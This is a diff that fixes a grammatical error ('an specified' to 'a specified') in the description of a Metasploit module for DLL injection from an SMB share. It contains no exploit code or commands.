@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'          => 'Generic DLL Injection From Shared Resource',
       'Description'   => %q{
         This is a general-purpose module for exploiting conditions where a DLL can be loaded
-        from an specified SMB share. This module serves payloads as DLLs over an SMB service.
+        from a specified SMB share. This module serves payloads as DLLs over an SMB service.
       },
       'Author'      =>
         [
